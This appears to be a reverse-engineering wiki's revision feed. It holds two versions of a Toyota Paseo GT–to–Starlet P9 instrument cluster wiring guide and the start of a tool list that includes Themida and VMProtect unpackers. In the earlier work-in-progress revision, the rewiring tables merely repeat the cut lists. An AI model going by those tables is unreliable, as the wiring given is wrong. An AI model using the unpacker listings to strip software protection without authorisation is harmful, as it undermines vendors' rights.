|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT (cut close at FU terminal, leave room to solder)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to the top of the high beam indicator light were we disconnected two traces.&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown) &lt;br /&gt;
|-&lt;br /&gt;
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)&lt;br /&gt;
|}&lt;br /&gt;
Important disconnect both high beam indicator light traces on the top. Just jump the rest of the trace.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 8''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Must now connect to what '''PIN 7''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Must now connect to what '''PIN 9''' went to&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3253</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3253"/>
		<updated>2025-12-31T13:12:38Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: initial commit. Work in progress..&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;WIP.&lt;br /&gt;
&lt;br /&gt;
= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on thee back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3197</id>
		<title>Software Tools</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3197"/>
		<updated>2025-08-12T17:46:52Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: Add search engines: SearXNG, websurfx, Mwmbl, YaCy P2P search engines. Add more social junk.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Software_wiki_banner.png|frameless|1280x300px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!&lt;br /&gt;
==Tool Index==&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====RF Signals Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnuradio.org/ GNU Radio]  - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -&amp;gt; Import –&amp;gt; Raw Data -&amp;gt; Radio Wave File)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Firmware Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ReFirmLabs/binwalk binwalk]  - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!&lt;br /&gt;
&lt;br /&gt;
====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====&lt;br /&gt;
&lt;br /&gt;
*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] -  is a tool designed to extract files from any type of extractable file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.&lt;br /&gt;
&lt;br /&gt;
=====Themida Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.&lt;br /&gt;
&lt;br /&gt;
=====VMProtect Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
======VMProtect 2======&lt;br /&gt;
